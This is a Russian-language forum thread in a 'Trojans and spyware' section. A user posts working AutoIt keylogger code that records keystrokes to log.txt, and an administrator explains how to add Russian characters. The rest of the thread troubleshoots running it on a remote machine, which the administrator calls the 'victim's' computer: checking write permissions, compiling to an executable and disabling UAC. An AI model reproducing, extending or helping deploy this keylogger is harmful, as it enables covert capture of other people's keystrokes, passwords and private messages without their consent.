Ищу простой кейлогер

Тема в разделе "Трояны и шпионские программы", создана пользователем Magic_Mushroom, 28 ноя 2014.

↑ ↓
  1. Magic_Mushroom Житель форума
    Magic_Mushroom
    Ответить в чате

    Форумчанин

    Регистрация:
    30.06.2014
    Сообщения:
    179
    Симпатии:
    89
    Репа:
    +90 / 0 / -0
    нужен простенький кейлогер, чтобы при включении в папке появлялся текстовик с логами клавишь blush1
    был такой, но почему-то перестал работать вместе с кейлогером из пунто свитчера :с
    буду очень благодарен за помощь :)
     
  2. Magic_Mushroom Житель форума
    Magic_Mushroom
    Ответить в чате

    Форумчанин

    Регистрация:
    30.06.2014
    Сообщения:
    179
    Симпатии:
    89
    Репа:
    +90 / 0 / -0
    Код:
    #include<misc.au3>
    $dll=DllOpen("user32.dll")
    while 
    1
    Dim $array
    [70]=[' ','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','[F1]','[F2]','[F3]','[F4]','[F5]','[F6]','[F7]','[F8]','[F9]','[F10]','[F11]','[F12]','e','+',',','-','.','u','o','\',"'",'i','[INVIO]','[SHIFT]','[CTRL]','[ALT]','[ESC]','[SCREEN]','[CANC]','[FRECCIA SINISTRA]','[FRECCIA SU]','[FRECCIA DESTRA]','[FRECCIA GIU]']
            Dim 
    $hex[70]=['20','41','42','43','44','45','46','47','48','49','4A','4B','4C','4D','4E','4F','50','51','52','53','54','55','56','57','58','59','5A','30','31','32','33','34','35','36','37','38','39','70','71','72','73','74','75','76','77','78','79','7A','7B','BA','BB','BC','BD','BE','BF','C0','DC','DB','DD','0D','10','11','12','1B','2C','2E','25','26','27','28']
    for 
    $i=0 to 69
    If _IsPressed(
    $hex[$i],$dll)Then
              FileWrite ("
    log.txt",$array[$i])
            EndIf
            While _IsPressed(
    $hex[$i]) = 1
            WEnd
    next
    WEnd
    нашел кейлогер на аутоите , но он записывает только английские буквы, мб кому-то не сложно допилить сюда русские?blush1
    буду премного благодарен :)
     
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.805
    Симпатии:
    426
    Пол:
    Мужской
    Репа:
    +959 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Ну а если самому головой подумать ?

    Код:
    Dim $array[70]=[' ','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','[F1]','[F2]','[F3]','[F4]','[F5]','[F6]','[F7]','[F8]','[F9]','[F10]','[F11]','[F12]','e','+',',','-','.','u','o','\',"'",'i','[INVIO]','[SHIFT]','[CTRL]','[ALT]','[ESC]','[SCREEN]','[CANC]','[FRECCIA SINISTRA]','[FRECCIA SU]','[FRECCIA DESTRA]','[FRECCIA GIU]']
            Dim 
    $hex[70]=['20','41','42','43','44','45','46','47','48','49','4A','4B','4C','4D','4E','4F','50','51','52','53','54','55','56','57','58','59','5A','30','31','32','33','34','35','36','37','38','39','70','71','72','73','74','75','76','77','78','79','7A','7B','BA','BB','BC','BD','BE','BF','C0','DC','DB','DD','0D','10','11','12','1B','2C','2E','25','26','27','28']
    for 
    $i=0 to 69
    Dim $array[70] - Инглиш алфавит, Dim $hex[70] - коды кнопок...

    for $i=0 to 69
    If _IsPressed($hex[$i],$dll)Then
    FileWrite ("log.txt",$array[$i])

    Если нажата кнопа, вывод из того массива инглиша...

    Делаешь два массива:Один русские символы, второй его коды, далее тупо добавляешь код (for $i=0 to ...) и всё !Отдыхай!!!
     
    • Мне нравится Мне нравится x 2
  4. Magic_Mushroom Житель форума
    Magic_Mushroom
    Ответить в чате

    Форумчанин

    Регистрация:
    30.06.2014
    Сообщения:
    179
    Симпатии:
    89
    Репа:
    +90 / 0 / -0
    спасибо, я уже и сам разорбрался :D
    только вот возникла не понятная проблема , на удаленном компьютере не хочет работать не в какую ._.
    ну просто не появляется log.txt и все тут, я уже и на мультиюзерность пропатчил, с учетки другой запускаешь, все пашет, запускаю с нужной учетки через рмс и log.txt не появляется Не въехал!!!
    уже и другой кейлогер на аутоите нашел, и он тоже отказывается там работать, хотя на моем компьютере все работает на ура , не подскажете в чем может быть проблема? Не въехал!!!
    буду очень благодарен, весь день мучаюсь с этой не понятной проблемой, антивирус снес, так что он тут не при чем Не въехал!!!
     
  5. Magic_Mushroom Житель форума
    Magic_Mushroom
    Ответить в чате

    Форумчанин

    Регистрация:
    30.06.2014
    Сообщения:
    179
    Симпатии:
    89
    Репа:
    +90 / 0 / -0
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.805
    Симпатии:
    426
    Пол:
    Мужской
    Репа:
    +959 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Проверь права, может сохраняешь файл log.txt туда где нет прав на запись, например на диск C, при включонном уак ничего несохранится нужно сохранять в папку пользователя...
     
  7. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.805
    Симпатии:
    426
    Пол:
    Мужской
    Репа:
    +959 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    И ещё может он незапускается на компе жертве, нужно компилировать в экзешник что-бы запустился...
     
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.805
    Симпатии:
    426
    Пол:
    Мужской
    Репа:
    +959 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Или ставить аутоит !
     
  9. Magic_Mushroom Житель форума
    Magic_Mushroom
    Ответить в чате

    Форумчанин

    Регистрация:
    30.06.2014
    Сообщения:
    179
    Симпатии:
    89
    Репа:
    +90 / 0 / -0
    в экзешник скомпилировал, а вот на счет uac сейчас проверю, спасибо , на удаленном компьютере как раз только диск С есть , ну я вроде пробовал запускать в папке пользователя , но все равно не работало, сейчас попробую отключить UAC :)
     
  10. Magic_Mushroom Житель форума
    Magic_Mushroom
    Ответить в чате

    Форумчанин

    Регистрация:
    30.06.2014
    Сообщения:
    179
    Симпатии:
    89
    Репа:
    +90 / 0 / -0
    отключил UAC, все заработало, спасибо Отдыхай!!!
     
    • Мне нравится Мне нравится x 1

Поделиться этой страницей